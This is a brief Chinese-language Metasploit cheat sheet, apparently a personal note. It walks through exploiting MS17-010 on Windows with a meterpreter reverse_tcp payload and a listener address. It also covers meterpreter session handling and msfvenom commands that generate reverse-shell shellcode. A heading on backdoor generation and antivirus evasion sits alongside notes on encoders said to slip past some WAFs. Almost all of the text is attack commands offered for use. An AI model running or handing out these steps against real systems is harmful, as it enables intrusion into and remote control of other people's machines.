Metasploit Framework 简单用用
msfconsole
1 2 3 4 5 6 7 8 9
| $ msfconsole msf6 > search ms17_010 msf6 > use 1 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_psexec) > show payloads msf6 exploit(windows/smb/ms17_010_psexec) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_psexec) > show options msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.41.148 msf6 exploit(windows/smb/ms17_010_psexec) > exploit
|
meterpreter 操作
1 2 3
| meterpreter> shell meterpreter> background msf6 exploit(windows/smb/ms17_010_psexec) > session -l
|
msfvenom
后门生成,免杀
寻找payload
1 2
| $ msfvenom -l payload | grep linux $ msfvenom -p linux/x86/meterpreter/reverse_tcp --list-options
|
生成shellcode
1 2 3 4
|
$ msfvenom -p linux/x86/meterpreter/reverse_tcp -a x86 --platform=linux LHOST=127.0.0.1 LPORT=9001 -f c
|
encoder:可以过掉部分waf
1 2 3 4
| $ msfvenom --list encoders
$ msfvenom -e php/base64 -i 10
|
other
生成随机字符串
1
| $ msf-pattern_create -l 100
|